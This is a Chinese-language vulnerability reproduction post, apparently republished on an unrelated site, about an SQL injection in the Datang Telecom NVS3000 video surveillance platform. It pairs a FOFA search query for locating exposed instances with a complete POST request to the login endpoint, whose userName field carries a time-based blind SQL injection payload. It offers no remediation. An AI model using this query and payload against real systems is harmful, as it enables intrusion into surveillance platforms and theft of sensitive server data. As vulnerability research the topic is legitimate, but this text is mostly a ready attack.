【漏洞复现】大唐电信NVS3000综合视频监控平台 sql注入漏洞 |
您所在的位置:网站首页 › 959330 › 【漏洞复现】大唐电信NVS3000综合视频监控平台 sql注入漏洞 |
|
本文主要是介绍【漏洞复现】大唐电信NVS3000综合视频监控平台 sql注入漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧! 0x01 产品简介大唐电信NVS3000综合视频监控平台是一种基于宽带网络的图像监控、存储、管理的远程视频监控系统。该系统结合了电信、网通等运营企业、或其它行业、企事业单位的内部网络,实现了跨域、大范围的统一监控、存储、管理、资源共享,为行业管理决策者提供全新、直观、扩大视觉和听觉范围的管理工具,提高工作绩效。 0x02 漏洞概述大唐电信NVS3000综合视频监控平台存在sql注入,攻击者可以通过该漏洞获取服务器敏感信息。 0x03 测绘语句 fofa: body="综合视频监控平台" && body="验证码" 0x04 漏洞复现漏洞复现: POST /nvsthird/ocxUserLogin HTTP/1.1Host:Content-Type: application/json{"userName":"asda' AND (SELECT 4094 FROM (SELECT(SLEEP(4)))hyJC) AND 'FYBK'='FYBK","password":"sadsa","code":"67a5"}这篇关于【漏洞复现】大唐电信NVS3000综合视频监控平台 sql注入漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助! |
| CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |